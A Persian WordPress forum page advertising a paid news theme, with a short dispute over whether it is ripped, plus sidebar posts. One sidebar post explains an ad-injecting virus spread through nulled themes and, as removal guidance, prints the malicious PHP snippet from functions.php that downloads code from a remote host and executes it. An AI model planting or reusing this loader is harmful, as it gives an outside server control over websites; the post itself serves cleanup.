• اطلاعیه ها

• Morteza

باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس

4 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

قالب خبری وردپرس سنا نیوز مخصوص سایتهای خبری می باشد که با رعایت کامل اصول سئو و بهینه سازی وبسایت طراحی شده است. داشتن سئوی ۱۰۰ درصد در سایت http://chkme.com/ از مزایای این قالب است. شما با پرداخت کمترین هزینه صاحب قالب خبری کاملا حرفه ای وردپرس خواهید شد.

دیگر مزایای این قالب را با هم بررسی می کنیم:

کد نویسی استاندارد و بدون اشکال.

نمایش یکسان قالب وردپرس در تمامی مرورگرهای معروف

دارای ۲ اسلاید شوی زیبا جهت مایش اخبار ویژه و گالری تصاویر وردپرس

دارای ۲ منوی مجزا با قابلیت مدیریت از طریق فهرستهای وردپرس

سبک و با سرعت لود فوق العاده

استفاده از تکنیکهای html,css3,javascript,jquery,php

قابلیت پخش فیلم آنلاین در ادامه مطلب

دارای ۵ سایدباز مجزا برای صفحه اصلی و صفحات داخلی با قابلیت کنترل توسط ابزارک وردپرس

دارای ۵ محل ایجاد تبلیغات در محلهای مختلف با قابلیت کنترل توسط ابزارک وردپرس

دیدگاههای تو در تو

سازگاری با آخرین نسخه وردپرس

قابلیت خصوصی سازی و تغییر رنگبندی با کمترین هزینه

دارای نمونه نصب شده آنلاین

تصویری از صفحه اصلی:

%D9%82%D8%A7%D9%84%D8%A8-%D8%AE%D8%A8%D8%B1%DB%8C-%D9%88%D8%B1%D8%AF%D9%BE%D8%B1%D8%B3.jpg

نصب و راه اندازی به صورت رایگان انجام می شود

فقط و فقط 29000 تومان

برای خرید به لینک زیر بروید:

لینک خرید

ویرایش شده در توسط yoonesgholamy
0

به اشتراک گذاری این پست

لینک به پست

فکر میکنم قالب ریپ شده است

1

به اشتراک گذاری این پست

لینک به پست

ارسال شده در (ویرایش شده)

به هیچ عنوان چون طراح اول و آخرش خودم هستم و تا کنون روی 2 وبسایت نصب شده.از مدیر انجمن محترمی مثل شما انتظار نداشتم بدون بررسی و تحقیق مطلبی رو بفرستید؟

ویرایش شده در توسط yoonesgholamy
0

به اشتراک گذاری این پست

لینک به پست

به هیچ عنوان چون طراح اول و آخرش خودم هستم و تا کنون روی 2 وبسایت نصب شده.از مدیر انجمن محترمی مثل شما انتظار نداشتم بدون بررسی و تحقیق مطلبی رو بفرستید؟

ایشون به طور قطعی نگفتند که قالب ریپ هست.

فکر میکنم قالب ریپ شده است

2

به اشتراک گذاری این پست

لینک به پست

• مطالب مشابه

• توسط logomaster
      سلام دوستان . من دوتا لینک انتهای این تیکت میزارم که مربوط به یک قالب هست ( دو صفحه از یک قالب)
      ساختار کلی این قالب بسیار خوبه از دید من و میخواستم از تم فارست خریداری کنم ! اما به دلیل اینکه فروش خوبی نداشته ، پشتیبانی خوبی نداره و تا بحال فقط یکبار آپدیت شده ، نمیخوام ریسک کنم.
      حالا از دوستان اگر کسی یک قالب مشابه این ( از نظر ساختار و قالب بندی محتوا ، کدهای کوتاه و.... ) میشناسه به من معرفی کنه . این قالب خیلی خیلی به ایده آلی که من از یک قالب در ذهن دارم نزدیکه.
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/form/
      http://demo.cmssuperheroes.com/themeforest/inbound-marketing/services-2-2/
    • توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط admin0098
      سلام من یه قالب شخصی درست کردم. چجوری میتونم قالب دومم که از هدرو فوتر قالب اول استفاده میکنه ایجاد کنم. مسیر فایل نمیدونم.

• توسط mansarifar
      توی پوسته jobmonster  که یک پوسته کاریابیه. رزومه کارجو ها رو فقط کسانی که شغل تعریف می کنند میتونن ببینن. میخواستم این دسترسی رو تغییر بدم . یعنی همه بتونن ببینن.کسی می تونه کمک کنه؟ ممنون میشم